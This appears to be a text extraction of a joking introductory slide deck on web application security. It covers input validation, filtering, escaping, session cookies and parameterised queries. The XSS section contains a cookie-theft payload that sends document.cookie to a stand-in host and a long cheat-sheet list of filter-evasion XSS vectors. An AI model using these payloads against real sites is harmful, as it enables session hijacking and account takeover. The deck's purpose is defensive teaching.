Basic Web Application Security

Basic WebApplication

Security

User Input

Kick Your Arse

Three Ways(All Awesome)

Validation

Passive(No touchy-touchy)

This is a Number.

This is not a Number.

This is really not a Number.

Filtering

Destructive(One-Way Street)

Only letting the good stuff in.

Keeping out the bad stuff.

What’s the diff?(Bro.)

Both can be error-prone...

White-Listing Usability Problems

What happens whenyou screw it up?

Black-Listing Security Problems

(Always a trade-off.)

Escaping

TransportPoint A Point B

Data will be the same on both sides.

Different Media,Different Escaping

Sam O’Brien

INSERT INTO mah_peeps (name)VALUES (‘Sam O\’Brien‘);

1, Sam O’Brien, 2010-09-02 18:30:00

XSS(Cross-Site Scripting)

(XTREME Site Scripting)

Sticking Scripts Where They Don’t Belong.

You there, down the back.Stop sniggering.

</script>

Amateurs!

</script>

src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”

style=“display:none;”>’);</script>

Oh shit.

Why is this uncool?

(Yeah! Why?)

style=“display:none;”>’);</script>Ooooh shit.

Oooooooooooh shit.

Oooooooooooooooooh shit.

Why is this really uncool?

(Because shut up.)

HTTPHyper-Text Thingy I-forgot-again

Stateless

No Idea Who You Are.

It can guess.(Badly.)

IP AddressBrowser User-Agent

Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every

request.)

The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1

Browser sends the ID every request.

PHPSESSID=123your456mum789

style=“display:none;”>’);</script>Look again.

THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-

Preventing Shenanigans

Validation Really Hard.

Filtering Still Really Hard.

Use a library, eg. HTML Purifier.

Escaping Dead Easy.

Most languages have stuff to handle this, eg.

htmlentities(), cgi.escape(), CGI.escape()

How hard is filtering?

(It’s just <script>, right?)

THIS HARD.<IMG SRC=javascript:alert('a')><img src=javascript:alert("a")><img “””><script>alert('a')</script>”><IMG SRC=javascript:alert('XSS')><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><IMG SRC="jav ascript:alert('a');“>

(Well, then.)

<IMG SRC="jav as&#x09cript:alert('XSS');"><IMG SRC="jav
ascript:alert('XSS');"><SCR\0IPT>alert('a')</SCR\0IPT><SCRIPT/a SRC="http://foo/x.js"></SCRIPT><img onmouseover!#$%&=alert('a')><<SCRIPT>alert("a");//<</SCRIPT><SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT><SC\0RIPT SRC=http://foo/x.js?<B><script src=//foo/x.js><img src=”javascript:alert('a')”

THIS HARD.<iframe src=http://foo/x.html <<body background=”javascript:alert('a')”><BODY ONLOAD=alert('a')><img dynsrc=”javascript:alert('a')”><img lowsrc=”javascript:alert('a')”><BGSOUND SRC=javascript:alert('a')><BR SIZE=”&{alert('a')}”><LAYER SRC=”http://foo/x.html”></LAYER><link rel=”stylesheet” href=”javascript:alert('a');”><XSS STYLE="behavior: url(xss.htc);"><STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

(Well, then.)

<IMG SRC='vbscript:msgbox(“a”)'><img src=”livescript:alert('a')”>žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert('a');”><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><TABLE BACKGROUND="javascript:alert('XSS')">

THIS HARD.<DIV STYLE="background-image: url(javascript:alert('a'))"><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><DIV STYLE="background-image: url(javascript:alert('a'))"><DIV STYLE="width: expression(alert('a'));"><STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE><IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("a"))'><STYLE TYPE="text/javascript">alert('a');</STYLE>

(Well, then.)

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A><BASE HREF="javascript:alert('a');//"><OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT><EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg=="type="image/svg+xml" AllowScriptAccess="always"></EMBED><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

One more thing about XSS.

(Groan.)

Remember <script>alert()</script>

?(Yes, I do. Shut up.)

alert() can be ANY JAVASCRIPT.

(Yes, and...?)

Do you have any forms on your page?

(Yes.)

Do you have any javascript functions your site uses to do anything

useful?(... Yes.)

Do your site make any AJAX calls to do anything useful?

(... Oh.)

That injected code can trigger forms, run

javascript functions, or make AJAX calls.

(... Oooooh.)

Send someone to a link that looks like:

http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)

Or store something that will output this on someone’s profile

(... Oooooooooooooooh.)

... And you’re hosed.

(Shit.)

The Human Element

Touchy-Feely Commie Bullshit.

We are very fallible.

We will forget things.

When time gets short, we take the easy path.

Design systems so that they naturally

encourage security.

Insert(“INSERT INTOposts VALUES

(‘”.sql_safe($title).”’, ‘“.sql_safe($content).”’,

‘”.sql_safe($author).”’)”);

insert(“INSERT INTOposts VALUES

(:title, :content, :author)”,$title, $content, $author);

<h3><%= title %> - <%= date %><h3><div><%= raw(post_body) %></div><p>Written by <%= author %></p>

<div><?=$post_body;?></div><p>Written by <?

=htmlentities($author);?></p>

Questions?

Now get out.

Basic Web Application Security

Documents

Basic security & info

Security Application

Real Application Security Administrator's and Developer's ... · Real Application Security: Putting It All Together 5-26 Basic HR Scenario: Implementation Tasks 5-26 Connecting as

Web Application Security SSE USTC Qing Ding. Agenda General security issues Web-tier security requirements and schemes HTTP basic authentication based

New Managed Application Security - OWASP · 2020. 1. 17. · 4 COMPELLING & BASIC TRUTHS ABOUT APPLICATION SECURITY Top breaches*: Web Application Attacks 30% CyberEspionage 14.93%

Security Alg Basic

Basic security concepts

Application Security 101web.uvic.ca/~garyperkins/Lecture 08 - Application Security 101.pdf · Application Security 101 Tanya Janca Security Trainer and Coach at SheHacksPurple.dev

050308 Basic Security

Php Basic Security

MANAGING APPLICATION SECURITY...AN APPLICATION SECURITY PROGRAM MANAGING APPLICATION SECURITY PAGE 13 What do you use to track the effectiveness of your application security program?

BIG-IP Application Security Manager - F5 Networks€¦ · Considerations for application security synchronization.....31 Performing basic network configuration for synchronization

Basic Web Application Security

8: Basic Security

Application Security

BASIC SECURITY CONCEPTS What is security?

Basic Web Application Security. User Input Kick Your Arse

Application Security

Basic Security Computere

Database Application Security Models Database Application Security Models 1